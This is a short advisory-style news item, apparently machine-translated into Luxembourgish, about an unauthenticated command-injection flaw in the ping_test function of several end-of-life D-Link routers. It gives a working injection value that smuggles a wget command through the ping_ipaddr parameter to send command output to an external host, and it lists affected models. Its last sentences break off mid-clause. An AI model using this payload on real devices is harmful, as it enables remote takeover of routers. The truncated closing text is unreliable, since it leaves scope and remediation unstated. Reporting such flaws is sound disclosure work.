An D-Link Wireless Router
Interessanterweis, laut Firmware Entwéckler, soll den Uruff "ping_test" nëmmen no der Authentifikatioun ausgeführt ginn, awer an der Realitéit gëtt et op jidde Fall genannt, onofhängeg vun der Umeldung op de Webinterface. Besonnesch, wann Dir op de Application_sec.cgi Skript zougitt an de Parameter "action=ping_test" passéiert, gëtt de Skript op d'Authentifikatiounssäit ëmgeleet, awer gläichzäiteg mécht d'Aktioun mat ping_test assoziéiert. Fir de Code auszeféieren, gouf eng aner Schwachstelle am ping_test selwer benotzt, deen de Ping-Utility nennt ouni richteg d'Korrektheet vun der IP Adress ze kontrolléieren déi fir Tester geschéckt gëtt. Zum Beispill, fir d'wget Utility ze ruffen an d'Resultater vum Kommando "Echo 1234" op en externen Host ze transferéieren, gitt just de Parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
D'Präsenz vun der Schwachstelle gouf offiziell an de folgende Modeller bestätegt:
- DIR-655 mat Firmware 3.02b05 oder méi al;
- DIR-866L mat Firmware 1.03b04 oder méi al;
- DIR-1565 mat Firmware 1.01 oder méi al;
- DIR-652 (keng Informatioun iwwer problematesch Firmware Versioune gëtt geliwwert)
D'Ënnerstëtzungsperiod fir dës Modeller ass scho ofgelaf, also D-Link
Et gouf spéider entdeckt datt d'Schwachheet och war
Source: opennet.ru